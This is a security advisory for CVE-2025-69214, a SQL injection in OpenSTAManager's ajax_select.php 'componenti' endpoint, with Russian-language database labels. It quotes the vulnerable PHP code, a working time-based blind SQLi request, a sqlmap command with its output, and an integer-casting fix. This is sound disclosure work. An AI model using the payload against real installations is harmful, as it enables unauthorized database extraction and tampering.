GHSA-qjv8-63xq-gq8m

Опубликовано: 06 фев. 2026

Источник: github

Github: Прошло ревью

CVSS4: 8.7

Описание

OpenSTAManager has a SQL Injection in ajax_select.php (componenti endpoint)

Summary

A SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

Proof of Concept

Vulnerable Code

File: modules/impianti/ajax/select.php:122-124

case 'componenti': $impianti = $superselect['matricola']; if (!empty($impianti)) { $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')'; }

Data Flow

Source: $_GET['options']['matricola'] → $superselect['matricola']
Vulnerable: User input concatenated directly into IN() clause without sanitization
Sink: Query executed via AJAX framework

Exploit

Manual PoC (Time-based Blind SQLi):

GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=<valid-session>

SQLMap Exploitation:

sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \ --cookie="PHPSESSID=<session>" \ --dbms=MySQL \ --technique=T \ --level=3 \ --risk=3

SQLMap Output:

[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI back-end DBMS: MySQL >= 5.0.12

Impact

Data Exfiltration: Time-based blind SQL Injection allows complete database extraction
Authentication Bypass: Access to sensitive component and equipment data
Data Manipulation: Potential unauthorized modification of records

Remediation

Cast values to integers before using in SQL:

Before:

$impianti = $superselect['matricola']; if (!empty($impianti)) { $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')'; }

After:

$impianti = $superselect['matricola']; if (!empty($impianti)) { $ids = array_map('intval', explode(',', $impianti)); $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')'; }

Credit

Discovered by: Łukasz Rybak

Ссылки

https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m

Пакеты

Наименование

devcode-it/openstamanager

composer

Затронутые версииВерсия исправления

<= 2.9.8

Отсутствует

EPSS

Процентиль: 1%

0.0001

Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-69214

Дефекты

CWE-89

Связанные уязвимости

CVE-2025-69214

nvd

2 дня назад

OpenSTAManager is an open source management software for technical assistance and invoicing. In 2.9.8 and earlier, an SQL Injection vulnerability exists in the ajax_select.php endpoint when handling the componenti operation. An authenticated attacker can inject malicious SQL code through the options[matricola] parameter.

EPSS

Процентиль: 1%

0.0001

Низкий

8.7 High

CVSS4

CVE ID

CVE-2025-69214

Дефекты

CWE-89